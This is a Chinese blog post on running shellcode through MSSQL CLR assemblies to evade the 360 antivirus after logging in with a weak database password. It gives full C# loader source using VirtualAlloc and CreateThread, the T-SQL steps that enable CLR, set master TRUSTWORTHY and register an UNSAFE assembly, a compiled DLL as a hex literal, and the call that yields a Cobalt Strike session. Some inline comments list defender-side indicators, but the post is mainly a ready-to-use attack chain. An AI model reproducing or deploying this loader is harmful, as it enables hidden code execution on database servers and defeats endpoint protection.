
MSSQL CLR Bypass杀软

把h靶场整好之后有师傅来探讨没有web的环境,因为一般内网可能有弱口令,不过没有web服务

本来在sqlps还能用的情况下还是好过的,结果在那篇文章出来之后360直接把sqlps干掉了

后来碰到这样的情况又过不去了。。。。。。

最后再说几句废话:CLR是和UDF很像的东西。网上很多文章都是用CLR创建cmd进程来执行命令,而在sqlserver下创建进程是会被拦截的,所以当时肤浅地以为CLR也没用了。现在再去看,既然都可以用C#编程了,直接写个加载器把shellcode加载到内存不就可以了。

0x01 配置

首先需要安装Visual Studio,找到Visual Studio Installer,点击修改找到数据存储和处理

勾选后点击右下角修改

打开Visual Studio创建Sql Server数据库项目

点击Properties,修改目标平台,选上创建脚本.sql文件

修改目标框架,像win2008要选.net3.5,权限级别修改为UNSAFE(后面的代码要通过P/Invoke调用kernel32里的非托管API,SAFE和EXTERNAL_ACCESS都不允许调用非托管代码,所以只能选UNSAFE)

然后到项目右键->新建项

然后就可以开始写代码了

0x02 代码

using System;
using Microsoft.SqlServer.Server;
using System.Runtime.InteropServices;


/// <summary>
/// SQL CLR stored-procedure container from the article. It exposes one procedure that
/// decodes a hex string into bytes, copies them into executable memory inside the
/// SQL Server process and starts a thread on that memory.
/// </summary>
/// <remarks>
/// Defender view: nothing here spawns a child process, so controls that only watch
/// process creation under SQL Server do not see it. What remains observable is
/// (1) an assembly registered with the UNSAFE permission set, (2) P/Invoke imports of
/// VirtualAlloc and CreateThread from kernel32 in that assembly's metadata, and
/// (3) a thread in the SQL Server process whose start address lies in private
/// read-write-execute memory that is not backed by a loaded image.
/// </remarks>
public partial class StoredProcedures
{
/// <summary>
/// CLR stored-procedure entry point. Passes <paramref name="sc"/> to
/// <see cref="shellcode_exec"/> and sends the returned string to the caller through
/// the SQL pipe; shellcode_exec always returns "", so the client receives an empty message.
/// </summary>
/// <param name="sc">Hex string, two characters per byte, supplied by the T-SQL caller.</param>
[Microsoft.SqlServer.Server.SqlProcedure]
public static void shellcode_loader(string sc)
{
// Place code here (placeholder comment left over from the project template).
SqlContext.Pipe.Send(shellcode_exec(sc));
}

/// <summary>
/// Decodes <paramref name="sc"/> from hex into a byte buffer, copies the buffer into
/// newly committed executable memory and starts a thread at that address.
/// </summary>
/// <param name="sc">Hex string, two characters per byte.</param>
/// <returns>Always the empty string.</returns>
public static string shellcode_exec(string sc)
{
// Fixed 1000-byte buffer; unused trailing bytes stay zero and are copied as well.
byte[] sa = new byte[1000];
// Two hex characters encode one byte.
int shellcode_len = sc.Length / 2;
for (int i = 0; i < shellcode_len; i++)
{
// Parse each two-character pair as a base-16 number and keep it as one byte.
string code = "0x" + sc.Substring(i * 2, 2);
int a = Convert.ToInt32(code, 16);
sa[i] = (byte)a;
}

// 0x1000 is MEM_COMMIT and 0x40 is PAGE_EXECUTE_READWRITE: the region is writable and
// executable at the same time, which is the allocation pattern memory scanners key on.
UInt32 shellcodeAddress = VirtualAlloc(0, (UInt32)sa.Length, 0x1000, 0x40);
// Copies the entire buffer (sa.Length bytes), not just the decoded portion.
Marshal.Copy(sa, 0, (IntPtr)(shellcodeAddress), sa.Length);
// Starts a thread at the copied bytes; the returned handle is discarded and the
// procedure does not wait for the thread.
CreateThread(0, 0, shellcodeAddress, 0, 0, 0);
return "";

}
// P/Invoke declaration for kernel32!VirtualAlloc. Calling unmanaged code like this is
// what forces the assembly to be registered WITH PERMISSION_SET = UNSAFE.
[DllImport("kernel32")]
private static extern UInt32 VirtualAlloc(UInt32 lpAddress, UInt32 dwSize, UInt32 flAllocationType, UInt32 flProtect);

// P/Invoke declaration for kernel32!CreateThread; pointer-sized parameters are declared as UInt32 here.
[DllImport("kernel32")]
private static extern UInt32 CreateThread(UInt32 lpThreadAttributes, UInt32 dwStackSize, UInt32 lpStartAddress, UInt32 lpParameter, UInt32 dwCreationFlags, UInt32 lpThreadId);
}

这里主要还是模仿Y4大佬的,把cmd执行命令的函数改为了直接加载shellcode

在C#中使用下面的方法(P/Invoke)调用Windows API

// P/Invoke declaration: binds a static extern method to kernel32!VirtualAlloc.
// Inside SQL CLR, a DllImport like this is only permitted for assemblies registered
// WITH PERMISSION_SET = UNSAFE, and the imported API names remain visible in the
// assembly metadata, which gives reviewers of registered assemblies something to search for.
[DllImport("kernel32")]
private static extern UInt32 VirtualAlloc(UInt32 lpAddress, UInt32 dwSize, UInt32 flAllocationType, UInt32 flProtect);

往mssql传的参数需要为字符串,所以还需要把十六进制字符串还原成二进制的shellcode:用for循环每次读两个字符,按十六进制解析成一个字节存到数组中,循环结束后把数组内容拷贝到申请的内存里,再创建新线程执行

在bin文件夹下面会生成sql文件

mssql中执行

-- Server-level preparation. Every statement here needs a highly privileged login
-- (the scenario in the article is a weak database password), and each one leaves
-- configuration state that can be audited afterwards:
--   * sys.configurations        -> 'clr enabled' with value_in_use = 1
--   * sys.databases             -> is_trustworthy_on = 1 for master
--   * sys.assemblies            -> permission_set_desc = 'UNSAFE_ACCESS'
-- Turns on CLR integration, which is off by default.
sp_configure 'clr enabled', 1
GO
RECONFIGURE
GO
-- Marks master as TRUSTWORTHY so that an unsigned assembly can be loaded with
-- elevated permission sets. TRUSTWORTHY on master is rarely needed in production,
-- so this change is worth alerting on by itself.
ALTER DATABASE master SET TRUSTWORTHY ON;
GO
-- The CREATE ASSEMBLY that follows registers the compiled DLL inline as a hex literal.
-- The literal starts with 0x4D5A (the "MZ" PE header), so "CREATE ASSEMBLY ... FROM 0x4D5A"
-- combined with PERMISSION_SET = UNSAFE is a useful string to look for in SQL audit
-- logs and captured query text.
CREATE ASSEMBLY [MSSQL_ShellcodeLoader]
AUTHORIZATION [dbo]
FROM 0x4D5A90000300000004000000FFFF0000B800000000000000400000000000000000000000000000000000000000000000000000000000000000000000800000000E1FBA0E00B409CD21B8014CCD21546869732070726F6772616D2063616E6E6F742062652072756E20696E20444F53206D6F64652E0D0D0A2400000000000000504500004C010300B11ABD620000000000000000E00022200B013000000A0000000600000000000042280000002000000040000000000010002000000002000004000000000000000400000000000000008000000002000000000000030040850000100000100000000010000010000000000000100000000000000000000000F02700004F00000000400000D802000000000000000000000000000000000000006000000C000000B82600001C0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000200000080000000000000000000000082000004800000000000000000000002E746578740000004808000000200000000A000000020000000000000000000000000000200000602E72737263000000D80200000040000000040000000C0000000000000000000000000000400000402E72656C6F6300000C000000006000000002000000100000000000000000000000000000400000420000000000000000000000000000000024280000000000004800000002000500F0200000C8050000010000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000046280500000A0228020000066F0600000A2A000013300600770000000100001120E80300008D090000010A026F0700000A185B0B160D2B2772010000700209185A186F0800000A280900000A1F10280A00000A130406091104D29C0917580D090732D516068E6920001000001F4028030000060C0616086E280B00000A068E69280C00000A16160816161628040000062672070000702A1E02280D00000A2A0042534A4201000100000000000C00000076322E302E35303732370000000005006C00000004020000237E0000700200009802000023537472696E677300000000080500000C000000235553001405000010000000234755494400000024050000A400000023426C6F620000000000000002000001471502140900000000FA013300160000010000000D00000002000000050000000C0000000D000000040000000100000001000000020000000100000002000000000032010100000000000600B800E0010600D800E00106008E00AE010F0000020000060063024C010A00A20086010A00880286010A00750086010600F6004C010
6000E014C01060080024C010600A7014C0106002A01C1010000000012000000000001000100010010000F0200001500010001005020000000009600690150000100642000000000960030005500020000000000800091203F005A00030000000000800091205A0062000700E720000000008618A10106000D00000001004C00000001004C00000001004302000002000701000003007D00000004006A0200000100200200000200FB00000003004D02000004007A01000005003302000006004F000900A10101001100A10106001900A1010A003100A101060039006C00100041006700150051001F01230051001501270051005C022D0059000A003300610074023900690093023E002900A1010600200023009D002E000B006C002E00130075002E001B0094001A000100000107003F000100000109005A00010004800000000000000000000000000000000053010000020000000000000000000000470027000000000002000000000000000000000047001B00000000000000006B65726E656C333200546F496E743332003C4D6F64756C653E0053797374656D2E44617461006D73636F726C6962007368656C6C636F64655F65786563005669727475616C416C6C6F63007363006C705468726561644964004372656174655468726561640053656E64006765745F506970650053716C5069706500666C416C6C6F636174696F6E547970650044656275676761626C654174747269627574650053716C50726F63656475726541747472696275746500436F6D70696C6174696F6E52656C61786174696F6E734174747269627574650052756E74696D65436F6D7061746962696C6974794174747269627574650042797465006477537461636B53697A6500647753697A6500537472696E6700537562737472696E67006765745F4C656E677468004D61727368616C004D5353514C5F5368656C6C636F64654C6F616465722E646C6C0053797374656D004D5353514C5F5368656C6C636F64654C6F61646572007368656C6C636F64655F6C6F61646572006C70506172616D65746572004D6963726F736F66742E53716C5365727665722E536572766572002E63746F7200496E745074720053797374656D2E446961676E6F73746963730053797374656D2E52756E74696D652E496E7465726F7053657276696365730053797374656D2E52756E74696D652E436F6D70696C6572536572766963657300446562756767696E674D6F6465730053746F72656450726F63656475726573006C70546872656164417474726962757465730064774372656174696F6E466C616773006C7041646472657373006C7053746172744164647265737300436F6E636174004F626A65637400666C5
0726F74656374006F705F4578706C6963697400436F6E766572740053716C436F6E7465787400436F7079000005300078000001000000005440DD77BEBA9F4F9089D8C505C8F570000420010108032000010520010111110400001221042001010E0807051D0508090808032000080520020E08080500020E0E0E050002080E08040001180A080004011D0508180808B77A5C561934E089040001010E0400010E0E0700040909090909090006090909090909090801000800000000001E01000100540216577261704E6F6E457863657074696F6E5468726F7773010801000200000000000401000000000000000000B11ABD6200000000020000001C010000D4260000D408000052534453CAE6AC7AFF811645BFDC99029CAFCF1901000000443A5C76735F636F64655C4D5353514C5F5368656C6C636F64654C6F616465725C4D5353514C5F5368656C6C636F64654C6F616465725C6F626A5C52656C656173655C4D5353514C5F5368656C6C636F64654C6F616465722E7064620000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001828000000000000000000003228000000200000000000000000000000000000000000000000000024280000000000000000000000005F436F72446C6C4D61696E006D73636F7265652E646C6C0000000000FF2500200010000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001001000000018000080000000000000000000000000000001000100000030000080000000000000000000000000000001000000000048000000584000007C02000000000000000000007C0234000000560053005F00560045005200530049004F004E005F0049004E0046004F0000000000BD04EFFE00000100000000000000000000000000000000003F000000000000000400000002000000000000000000000000000000440000000100560061007200460069006C00650049006E0066006F00000000002400040000005400720061006E0073006C006100740069006F006E00000000000000B004DC010000010053007400720069006E006700460069006C00650049006E0066006F000000B801000001003000300030003000300034006200300000002C0002000100460069006C0065004400650073006300720069007000740069006F006E000000000020000000300008000100460069006C006500560065007200730069006F006E000000000030002E0030002E0030002E003000000054001A00010049006E007400650072006E0061006C004E0061006D00650000004D005300530051004C005F005300680065006C006C0063006F00640065004C006F0061006400650072002E0064006C006C0000002800020001004C006500670061006C0043006F0070007900720069006700680074000000200000005C001A0001004F0072006900670069006E0061006C00460069006C0065006E0061006D00650000004D005300530051004C005F005300680065006C006C0063006F00640065004C006F0061006400650072002E0064006C006C000000340008000100500072006F006400750063007400560065007200730069006F006E00000030002E0030002E0030002E003000000038000800010041007300730065006D0062006C0079002000560065007200730069006F006E00000030002E0030002E0030002E003000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000002000000C000000443800000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
WITH PERMISSION_SET = UNSAFE;

GO
-- Binds a T-SQL procedure to the static method StoredProcedures.shellcode_loader in
-- the registered assembly. @sc is passed to the method's string parameter.
-- CLR-backed procedures are listed in sys.assembly_modules, which links each one to
-- its assembly, class and method; reviewing that view shows procedures like this one.
CREATE PROCEDURE [dbo].[shellcode_loader]
@sc NVARCHAR (MAX)
AS EXTERNAL NAME [MSSQL_ShellcodeLoader].[StoredProcedures].[shellcode_loader]

然后执行

-- Calls the CLR procedure. The literal 'shellcode' is the author's placeholder for
-- the hex-string argument; the method decodes it two characters per byte.
exec shellcode_loader 'shellcode'

可以看到360没有拦截上线cs了

接下来只需要进程迁移,不要在sqlserver下面创建进程就可以了

0x03 参考

https://y4er.com/post/mssql-execute-command-with-clr-assemblies/